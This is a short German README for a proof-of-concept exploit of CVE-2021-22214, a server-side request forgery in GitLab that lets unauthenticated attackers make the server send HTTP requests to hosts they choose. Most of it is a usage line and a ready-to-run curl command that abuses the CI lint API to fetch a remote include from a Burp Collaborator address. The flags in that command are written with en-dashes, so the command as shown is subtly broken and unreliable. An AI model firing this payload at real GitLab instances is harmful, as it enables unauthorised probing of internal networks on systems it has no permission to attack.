
Proof-of-Concept-Exploit für CVE-2021-22214, eine Server-Side Request Forgery in GitLab-Webhooks, die es nicht authentifizierten Angreifern ermöglicht, interne HTTP-Anfragen zu senden.
POC für CVE-2021-22214: Gitlab SSRF
Die Remote-GitLab-Installation enthält eine Server-Side-Request-Forgery-Schwachstelle (SSRF), die dadurch entsteht, dass das interne Netzwerk für Webhooks aktiviert ist. Ein entfernter, nicht authentifizierter Angreifer kann eine registrierungsbeschränkte GitLab-Instanz ausnutzen und sie dazu veranlassen, HTTP-Anfragen an eine beliebige Domain seiner Wahl zu senden.
usage: python3 GitLab_SSRF.py <target> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'